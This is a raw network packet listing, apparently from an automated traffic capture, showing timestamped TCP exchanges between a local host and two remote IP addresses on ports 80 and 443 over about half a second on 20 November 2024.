                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.543531895 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.551691055 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.551806927 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.551881075 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.560152054 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.560228109 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.560293913 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.600298882 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.641932011 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.648848057 CET4434975913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.649431944 CET49759443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.649470091 CET4434975913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.651235104 CET49759443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.651242018 CET4434975913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.657241106 CET4434976113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.657804012 CET49761443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.657824039 CET4434976113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.658257961 CET49761443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.658266068 CET4434976113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.672914028 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.673171997 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.673278093 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.677197933 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.677290916 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.677365065 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.686425924 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.686573982 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.686798096 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.694869041 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.695193052 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.695321083 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.699819088 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.700092077 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.700191021 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.704684019 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.704977989 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.705075979 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.709049940 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.709286928 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.709419012 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.713654041 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.713735104 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.713821888 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.718401909 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.718596935 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.718677044 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.723170996 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.723474979 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.723551035 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.727116108 CET4434976013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.727921009 CET49760443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.727957964 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.727969885 CET4434976013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.728210926 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.728261948 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.728399038 CET49760443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.728408098 CET4434976013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.732733011 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.732997894 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.733062983 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.737576008 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.737870932 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.737952948 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.742321968 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.742703915 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.742769957 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.747160912 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.747529984 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.747605085 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.751869917 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.751952887 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.752026081 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.753904104 CET4434976213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.754604101 CET49762443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.754630089 CET4434976213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.755116940 CET49762443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.755122900 CET4434976213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.756638050 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.756771088 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.756839037 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.761408091 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.761789083 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.761867046 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.766190052 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.766393900 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.766460896 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.771069050 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.771105051 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.771203995 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.794951916 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.795850039 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.795936108 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.797341108 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.831326962 CET4434976313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.832057953 CET49763443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.832092047 CET4434976313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.832514048 CET49763443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.832528114 CET4434976313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.845022917 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.864797115 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.864998102 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.865066051 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.867100000 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.867155075 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.867212057 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.871526957 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.871717930 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.871774912 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.875803947 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.875971079 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.876025915 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.880214930 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.880351067 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.880418062 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.884453058 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.884505987 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.884578943 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.888495922 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.888592005 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.888667107 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.892467976 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.892507076 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.892565012 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.896186113 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.896295071 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.896353960 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.900084972 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.900161982 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.900230885 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.902915955 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.903038979 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.903095007 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.905857086 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.905992031 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.906043053 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.908857107 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.908951998 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.908998013 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.911861897 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.912113905 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.912167072 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.914856911 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.914983034 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.915168047 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.917815924 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.917947054 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.917999029 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.920783997 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.920866966 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.920916080 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.923813105 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.923964024 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.924091101 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.926843882 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.927100897 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.927158117 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.929780960 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.930056095 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.930108070 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.932853937 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.933000088 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.933051109 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.935736895 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.935801029 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.935849905 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.938070059 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.938332081 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.938380003 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.940396070 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.940535069 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.940592051 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.942675114 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.942874908 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.942929029 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.945084095 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.945228100 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.945290089 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.056938887 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.057135105 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.057210922 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.058132887 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.058316946 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.058367014 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.060440063 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.060832977 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.060877085 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.062721014 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.063090086 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.063136101 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.065063953 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.065288067 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.065411091 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.067373037 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.067619085 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.067666054 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.069458961 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.069511890 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.069556952 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.071563005 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.071763992 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.071805954 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.073709965 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.073853016 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.073900938 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.075671911 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.075932980 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.075975895 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.077658892 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.077924967 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.077969074 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.079624891 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.079703093 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.079744101 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.081665993 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.081876040 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.081921101 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.083635092 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.083730936 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.083774090 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.085566998 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.085794926 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.085834980 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.086441994 CET4434975913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.086617947 CET4434975913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.086678028 CET49759443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.086832047 CET49759443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.086844921 CET4434975913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.086858988 CET49759443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.086867094 CET4434975913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.087559938 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.087625980 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.087675095 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.089591980 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.089745045 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.089803934 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.090421915 CET49764443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.090451956 CET4434976413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.090523958 CET49764443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.090814114 CET49764443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.090826988 CET4434976413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.091511011 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.091640949 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.091682911 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.093561888 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.093764067 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.093806028 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.094693899 CET4434976113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.094857931 CET4434976113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.094913006 CET49761443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.095021963 CET49761443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.095032930 CET4434976113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.095043898 CET49761443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.095048904 CET4434976113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.095510006 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.095596075 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.095650911 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.097466946 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.097553968 CET49765443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.097579956 CET4434976513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.097629070 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.097682953 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.097798109 CET49765443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.098083019 CET49765443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.098097086 CET4434976513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.099477053 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.099586964 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.099633932 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.101425886 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.101809025 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.101852894 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.103530884 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.103833914 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.103878021 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.105385065 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.105595112 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.105638027 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.107440948 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.107592106 CET8049758185.215.113.16192.168.2.7
